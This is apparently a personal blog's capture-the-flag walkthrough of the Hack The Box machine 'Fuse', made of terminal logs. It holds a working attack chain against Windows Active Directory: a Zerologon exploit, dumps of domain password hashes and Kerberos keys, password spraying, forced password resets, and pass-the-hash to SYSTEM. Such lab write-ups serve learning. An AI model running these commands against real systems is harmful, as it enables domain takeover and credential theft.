htb-fuse-nl

FUSE

unintended way : zerologon

┌─[✗]─[puck@parrot-lt]─[/opt/CVE-2020-1472]
└──╼ $python3 cve-2020-1472-exploit.py fuse 10.10.10.193
Performing authentication attempts...
=====================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!
┌─[puck@parrot-lt]─[/opt/CVE-2020-1472]
┌─[puck@parrot-lt]─[~/htb/fuse]
└──╼ $impacket-secretsdump -just-dc -no-pass fuse\$@10.10.10.193
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up... 
┌─[puck@parrot-lt]─[~/htb/fuse]
└──╼ $impacket-secretsdump -just-dc -no-pass fuse\$@10.10.10.193
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8ee7fac1bd38751dbff06b33616b87b0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc-print:1104:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bnielson:1105:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
sthompson:1601:aad3b435b51404eeaad3b435b51404ee:5fb3cc8b2f45791e200d740725fdf8fd:::
tlavel:1602:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
pmerton:1603:aad3b435b51404eeaad3b435b51404ee:e76e0270c2018153275aab1e143421b2:::
svc-scan:1605:aad3b435b51404eeaad3b435b51404ee:38485fd7730cca53473d0fa6ed27aa71:::
bhult:7101:aad3b435b51404eeaad3b435b51404ee:8873f0c964ab36700983049e2edd0f77:::
dandrews:7102:aad3b435b51404eeaad3b435b51404ee:689583f00ad18c124c58405479b4c536:::
mberbatov:7601:aad3b435b51404eeaad3b435b51404ee:b2bdbe60565b677dfb133866722317fd:::
astein:7602:aad3b435b51404eeaad3b435b51404ee:2f74c867a93cda5a255b1d8422192d80:::
dmuir:7603:aad3b435b51404eeaad3b435b51404ee:6320f0682f940651742a221d8218d161:::
FUSE$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e6dcafd3738f9433358d59ef8015386a8c0a418a09b3e8968f8a00c6fa077984
Administrator:aes128-cts-hmac-sha1-96:83c4a7c2b6310e0b2323d7c67c9a8d68
Administrator:des-cbc-md5:0dfe83ce576d8aae
krbtgt:aes256-cts-hmac-sha1-96:5a844c905bc3ea680729e0044a00a817bb8e6b8a89c01b0d2f949e2d7ac9952e
krbtgt:aes128-cts-hmac-sha1-96:67f0c1ace3b5a9f43e90a00c1e5445c6
krbtgt:des-cbc-md5:49d93d43321f02b3
svc-print:aes256-cts-hmac-sha1-96:f06c128c73c7a4a2a6817ee22ce59979eac9789adf7043acbf11721f3b07b754
svc-print:aes128-cts-hmac-sha1-96:b662d12fedf3017aed71b2bf96ac6a99
svc-print:des-cbc-md5:fea11fdf6bd3105b
bnielson:aes256-cts-hmac-sha1-96:62aef12b7b5d68fe508b5904d2966a27f98ad83b5ca1fb9930bbcf420c2a16b6
bnielson:aes128-cts-hmac-sha1-96:70140834e3319d7511afa5c5b9ca4b32
bnielson:des-cbc-md5:9826c42010254a76
sthompson:aes256-cts-hmac-sha1-96:e93eb7d969f30a4acb55cff296599cc31f160cca523a63d3b0f9eba2787e63a5
sthompson:aes128-cts-hmac-sha1-96:a8f79b1eb4209a0b388d1bb99b94b0d9
sthompson:des-cbc-md5:4f9291c46291ba02
tlavel:aes256-cts-hmac-sha1-96:f415075d6b6566912c97a4e9a0249b2b209241c341534cb849b657711de11525
tlavel:aes128-cts-hmac-sha1-96:9ac52b65b9013838f129bc9a99826a4f
tlavel:des-cbc-md5:2a238576ab7a6213
pmerton:aes256-cts-hmac-sha1-96:102465f59909683f260981b1d93fa7d0f45778de11b636002082575456170db7
pmerton:aes128-cts-hmac-sha1-96:4dc80267b0b2ecc02e437aef76714710
pmerton:des-cbc-md5:ef3794940d6d0120
svc-scan:aes256-cts-hmac-sha1-96:053a97a7a728359be7aa5f83d3e81e81637ec74810841cc17acd1afc29850e5c
svc-scan:aes128-cts-hmac-sha1-96:1ae5f4fecd5b3bd67254d21f6adb6d56
svc-scan:des-cbc-md5:e30b208ccecd57ad
bhult:aes256-cts-hmac-sha1-96:f1097eb00e508bf95f4756a28f18f490c40ed3274b2fd67da8919647591e2c74
bhult:aes128-cts-hmac-sha1-96:b1f2affb4c9d4c70b301923cc5d89336
bhult:des-cbc-md5:4a1a209d4532a7b9
dandrews:aes256-cts-hmac-sha1-96:d2c7389d3185d2e68e47d227d817556349967cac1d5bfacb780aaddffeb34dce
dandrews:aes128-cts-hmac-sha1-96:497bd974ccfd3979edb0850dc65fa0a8
dandrews:des-cbc-md5:9ec2b53eae6b20f2
mberbatov:aes256-cts-hmac-sha1-96:11abccced1c06bfae96b0309c533812976b5b547d2090f1eaa590938afd1bc4a
mberbatov:aes128-cts-hmac-sha1-96:fc50f72a3f79c2abc43d820f849034da
mberbatov:des-cbc-md5:8023a16b9b3d5186
astein:aes256-cts-hmac-sha1-96:7f43bea8fd662b275434644b505505de055cdfa39aeb0e3794fec26afd077735
astein:aes128-cts-hmac-sha1-96:0d27194d0733cf16b5a19281de40ad8b
astein:des-cbc-md5:254f802902f8ec7a
dmuir:aes256-cts-hmac-sha1-96:67ffc8759725310ba34797753b516f57e0d3000dab644326aea69f1a9e8fedf0
dmuir:aes128-cts-hmac-sha1-96:692fde98f45bf520d494f50f213c6762
dmuir:des-cbc-md5:7fb515d59846498a
FUSE$:aes256-cts-hmac-sha1-96:ba250f2101ecad1a2aa8fab0c95d7a66b59c904eb0edd47121f51ff561f3fb2e
FUSE$:aes128-cts-hmac-sha1-96:bf995eed47e2a8849b72e95eabd5a929
FUSE$:des-cbc-md5:b085ab974ff1e049
[*] Cleaning up... 
┌─[puck@parrot-lt]─[~/htb/fuse]

 

1st a nmap scan

E:\PENTEST>nmap 10.10.10.193
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 11:38 W. Europe Summer Time
Nmap scan report for fuse.fabricorp.local (10.10.10.193)
Host is up (0.089s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl

Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds

E:\PENTEST>

enumerate more

root@kali:~/htb/fuse# nmap -p53,80,88,135,139,389,445,3389 -A -T4 fabricorp.local
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 05:56 EDT
Nmap scan report for fabricorp.local (10.10.10.193)
Host is up (0.086s latency).
rDNS record for 10.10.10.193: fuse.fabricorp.local

PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings: 
| DNSVersionBindReqTCP: 
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-17 10:13:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
3389/tcp filtered ms-wbt-server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=6/17%Time=5EE9E8E5%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016|2012|2008|10 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10:1607
Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 10 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h37m05s, deviation: 4h02m32s, median: 17m03s
| smb-os-discovery: 
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-06-17T03:16:16-07:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled and required
| smb2-time: 
| date: 2020-06-17 06:16:14
|_ start_date: 2020-06-17 00:32:55

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 85.26 ms 10.10.14.1
2 85.44 ms fuse.fabricorp.local (10.10.10.193)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.81 seconds
root@kali:~/htb/fuse#

.

┌─[✗]─[puck@parrot-lt]─[/opt/CVE-2020-1472]
└──╼ $python3 cve-2020-1472-exploit.py fuse 10.10.10.193
Performing authentication attempts…
=====================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!
┌─[puck@parrot-lt]─[/opt/CVE-2020-1472]

.

 

.

=> users : pmerton , tlavel , bnielson

check for more users

E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlist.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop

2020/06/17 12:06:02 > Using KDC(s):
2020/06/17 12:06:02 > fabricorp.local:88
2020/06/17 12:06:21 > [+] VALID USERNAME: administrator@fabricorp
2020/06/17 12:08:31 > [+] VALID USERNAME: Administrator@fabricorp
2020/06/17 12:16:07 > [+] VALID USERNAME: sthompson@fabricorp
2020/06/17 12:22:27 > [+] VALID USERNAME: fuse@fabricorp
2020/06/17 12:22:27 > [+] VALID USERNAME: bhult@fabricorp
2020/06/17 12:22:43 > Done! Tested 100000 usernames (5 valid) in 1001.177 seconds

combined

E:\PENTEST>kerbrute_windows_amd64.exe userenum --dc fabricorp.local -d fabricorp userlistsmall.txt

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/17/20 - Ronnie Flathers @ropnop

2020/06/17 12:27:46 > Using KDC(s):
2020/06/17 12:27:46 > fabricorp.local:88
2020/06/17 12:27:46 > [+] VALID USERNAME: fuse@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: Administrator@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: tlavel@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: sthompson@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: pmerton@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: bnielson@fabricorp
2020/06/17 12:27:46 > [+] VALID USERNAME: bhult@fabricorp
2020/06/17 12:27:46 > Done! Tested 9 usernames (7 valid) in 0.153 seconds

.

check if any of these 7 have UF_DONT_REQUIRE_PREAUTH set

root@kali:~/htb/fuse# GetNPUsers.py -dc-ip 10.10.10.193 -no-pass FABRICORP.LOCAL/bnielson
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for bnielson
[-] User bnielson doesn't have UF_DONT_REQUIRE_PREAUTH set

.

E:\PENTEST>crackmapexec.exe 10.10.10.193 -u usernames.txt -p Fabricorp01
06-17-2020 14:20:32 [*] 10.10.10.193:445 is running Windows 10.0 Build 14393 (name:FUSE) (domain:FABRICORP)
06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\fuse:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:34 [-] 10.10.10.193:445 FABRICORP\Administrator:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\tlavel:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\sthompson:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\pmerton:Fabricorp01 SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bnielson:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)
06-17-2020 14:20:35 [-] 10.10.10.193:445 FABRICORP\bhult:Fabricorp01 SMB SessionError: STATUS_PASSWORD_MUST_CHANGE(The user password must be changed before logging on the first time.)

.

tried but failed

Remote Windows Systems Using SyInternals PsPasswd

We all know that a good Administrator will find a way to automate or make boring tasks easy. Changing passwords on Windows systems, usually Administrator accounts, is one of those we least like to do but have to for audit purposes and also when other administrators leave.

Well, here is another tool that can help with changing passwords. The free utility PsPasswd is part of Microsoft’s SysInternal’s PsTools that lets you change an account password on the local or remote systems, to enable admin’s to create batch files that run PsPasswd against the computers they manage to perform a mass change of the administrator password.

And for security, PsPasswd does not send passwords over the network in the clear. You can use PsPasswd to change the password of a local or domain account on the local or a remote computer.

So how does it work?

usage: pspasswd [[\\computer[,computer[,..] | @file [-u user [-p psswd]]] Username [NewPassword]

computer – Perform the command on the remote computer or computers specified. If you omit the computer name the command runs on the local system, and if you specify a wildcard (\\*), the command runs on all computers in the current domain.
@file – Run the command on each computer listed in the text file specified.
-u – Specifies optional user name for login to remote computer.
-p – Specifies optional password for user name. If you omit this you will be prompted to enter a hidden password.
Username – Specifies name of account for password change.
NewPassword – New password. If ommitted a NULL password is applied.

So say we wanted to change the password on a server.

That’s all. Now say we don’t want to pass the password on the command line, then omit the -p and a popup will prompt you for the password.

E:\PENTEST>pspasswd \\10.10.10.193 -u tlavel -p Fabricorp01 tlavel F!bricorp02!

PsPasswd v1.24 - Local and remote password changer
Copyright (C) 2003-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Error changing password:
Access is denied.

E:\PENTEST>

.

tried

root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:1234567
Retype new SMB password:
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..
root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:Fabricorp02
Retype new SMB password: Fabricorp01
Password changed for user bnielson on 10.10.10.193.

.

root@kali:~/htb# smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password:Fabricorp01
New SMB password:Fabricorp02
Retype new SMB password:Fabricorp02
Password changed for user bnielson on 10.10.10.193.
root@kali:~/htb# smbclient //10.10.10.193/print$ -U bnielson
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\bnielson's password: Fabricorp02
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri May 29 20:12:41 2020
.. D 0 Fri May 29 20:12:41 2020
color D 0 Sat Jul 16 09:18:08 2016
IA64 D 0 Fri May 29 20:12:41 2020
W32X86 D 0 Mon Jun 1 05:03:44 2020
x64 D 0 Mon Jun 1 05:03:46 2020

10340607 blocks of size 4096. 7554925 blocks available
smb: \>

.

rpcclient -U “bnielson” 10.10.10.193

root@kali:~/htb# rpcclient -U "bnielson" 10.10.10.193
Enter WORKGROUP\bnielson's password:Fabricorp02 
rpcclient $> ls
command not found: ls
rpcclient $> help
--------------- ----------------------
CLUSAPI 
clusapi_open_cluster bla
clusapi_get_cluster_name bla
-snip-

rpcclient $>


rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

rpcclient $>

.

rpcclient $> enumprinters
flags:[0x800000]
name:[\\10.10.10.193\HP-MFT01]
description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
comment:[]

.

root@kali:/opt/evil-winrm# ruby evil-winrm.rb -i 10.10.10.193 -u svc-print
Enter Password: $fab@s3Rv1ce$1

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> cd desktop
*Evil-WinRM* PS C:\Users\svc-print\desktop> dir


Directory: C:\Users\svc-print\desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/17/2020 11:49 PM 34 user.txt


*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt
867719f8b9ef372cd05d1e30997c7d28
*Evil-WinRM* PS C:\Users\svc-print\desktop>

.

root@kali:~/htb/fuse# psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:370ddcf45959b2293427baa70376e14e Administrator@10.10.10.193
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.193.....
[*] Found writable share ADMIN$
[*] Uploading file VwvVtgEd.exe
[*] Opening SVCManager on 10.10.10.193.....
[*] Creating service fhoH on 10.10.10.193.....
[*] Starting service fhoH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>cd c:\users\desktop
The system cannot find the path specified.

C:\Windows\system32>cd c:\users

c:\Users>cd Administrator

c:\Users\Administrator>cd desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is E6C8-44FE

Directory of c:\Users\Administrator\Desktop

06/01/2020 02:03 AM <DIR> .
06/01/2020 02:03 AM <DIR> ..
06/17/2020 11:49 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 30,865,776,640 bytes free

c:\Users\Administrator\Desktop>type root.txt
2b81c0276298df3453ae7da86e9babf4

c:\Users\Administrator\Desktop>


.

.

c:\tja>pwdump8

PwDump v8.2 - dumps windows password hashes - by Fulvio Zanetti & Andrea Petralia @ http://www.blackMath.it

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:521A94AF0CFA785A1EEC638D803E482C
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0
DefaultAccount:503:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0

.

 

 

 

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *